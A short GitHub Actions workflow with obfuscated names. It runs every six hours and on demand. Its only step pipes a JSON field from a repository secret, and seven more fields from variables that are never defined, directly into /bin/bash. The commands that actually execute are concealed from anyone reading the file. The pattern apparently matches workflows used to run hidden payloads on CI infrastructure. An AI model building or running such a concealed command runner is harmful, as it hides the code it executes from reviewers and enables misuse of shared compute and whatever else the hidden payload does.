name: yanweibao6715

on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanweibao6715
        env:
          aksg420: ${{ secrets.aksg420 }}
        run: |
          echo $aksg420 | jq -r .kz2 | /bin/bash
          echo $rp89 | jq -r .xgz64191 | /bin/bash
          echo $xoi2157 | jq -r .dnhgl5 | /bin/bash
          echo $r546 | jq -r .y8773 | /bin/bash
          echo $uaji52 | jq -r .mmv44701 | /bin/bash
          echo $ezzw104 | jq -r .nqim8 | /bin/bash
          echo $punf86843 | jq -r .p328 | /bin/bash
          echo $xif494 | jq -r .xwi0 | /bin/bash

